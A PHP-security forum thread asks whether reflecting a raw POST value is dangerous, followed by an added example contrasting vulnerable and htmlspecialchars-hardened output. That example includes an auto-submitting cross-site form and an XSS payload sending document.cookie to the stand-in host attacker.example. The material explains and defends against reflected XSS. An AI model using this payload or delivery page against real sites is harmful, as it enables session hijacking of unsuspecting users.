User Sets Arbitrary Data on Page, but Only they can View it?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US


Post by Ambush Commander »

I've often heard that JavaScript is a tool of evil, but I've never exactly known the full capabilities of its evilness.

What I'd like to know is what damage a person could do if this happened:

We have a page that accepts POST parameters and then outputs them onto the page without cleaning them (it doesn't do anything else with them). That means that the user can put arbitrary data on the page, but no one else can view it. Is this a security hazard? And if so, how would one exploit it?
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Extremely dependent on page code and data handling.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

Sooo....

Code:

<?php

// Reflects the raw POST value straight into the response body.
echo $_POST['user'];

?>
would be "relatively" safe?
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto

Post by John Cartwright »

That is asking for trouble...
I cannot stress enough how important sanitizing user input can be.
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

I know. ;)

The main question is, however, can the contents of a webpage be manipulated so that even people who are not viewing the page are affected?
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

The "example" you used would generally suggest no... However, if there are any security holes introduced via PHP initialization directives or PHP's core itself, then yes. But since I didn't write the code, nor do I have the time or care to make massive security passes at it... :?
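As an added example (not code from the thread or from any of its posters), the following PHP puts the `echo $_POST['user']` page beside a hardened version and shows how a reflected, "only I can see it" POST value reaches another user: the attacker hosts a page on their own site that auto-submits a form to the vulnerable page, so the victim's browser makes the POST and the reflected script runs on the vulnerable site's origin with the victim's session. The hostnames `victim.example` and `attacker.example` and the path `page.php` are placeholders.

```php
<?php
// Added example, not from the original thread. Hostnames and paths are assumed.
declare(strict_types=1);

// Vulnerable: reflects the POST value verbatim, as in the snippet discussed above.
function render_vulnerable(array $post): string
{
    $user = (string)($post['user'] ?? '');
    return '<p>Hello, ' . $user . '</p>';
}

// Hardened: encode for the HTML context before output. ENT_QUOTES covers both
// quote styles, so the same encoding is also safe inside a quoted attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function html_escape(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(array $post): string
{
    $user = html_escape((string)($post['user'] ?? ''));
    return '<p>Hello, ' . $user . '</p>';
}

// What the attacker hosts on their own site. A victim who merely opens this page
// has their browser POST the payload to the vulnerable page; the browser then
// renders the reflection on the vulnerable site's origin, so the script runs
// with that origin's cookies and DOM. Nobody has to "view" the attacker's
// submission; the victim is the one who submits it.
// The payload is attribute-escaped here only so the attacker's own form is
// well-formed HTML; the browser decodes it back before sending.
function attacker_page(string $targetUrl, string $payload): string
{
    $action = html_escape($targetUrl);
    $value  = html_escape($payload);
    return <<<HTML
<form id="f" method="post" action="$action">
  <input type="hidden" name="user" value="$value">
</form>
<script>document.getElementById('f').submit();</script>
HTML;
}

// Constructed payload: exfiltrates document.cookie to the attacker's host.
$payload = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

echo "Vulnerable output (script tag survives intact):\n";
echo render_vulnerable(['user' => $payload]), "\n\n";

echo "Hardened output (angle brackets and quotes are encoded):\n";
echo render_hardened(['user' => $payload]), "\n\n";

echo "Attacker-hosted page that delivers the payload to another user:\n";
echo attacker_page('https://victim.example/page.php', $payload), "\n";
```

Two practical notes. First, the hardened form is only correct for output into HTML text or a quoted attribute; a value dropped into a `<script>` block, a URL, or an event handler needs the encoding for that context instead. Second, if the site's session cookie is marked `SameSite=Lax` or `SameSite=Strict`, a browser that honours the attribute will not attach it to this cross-site POST, which blunts the cookie theft shown here; the injected script still executes on the target origin, so the reflection remains a cross-site scripting bug and the fix is still to encode on output.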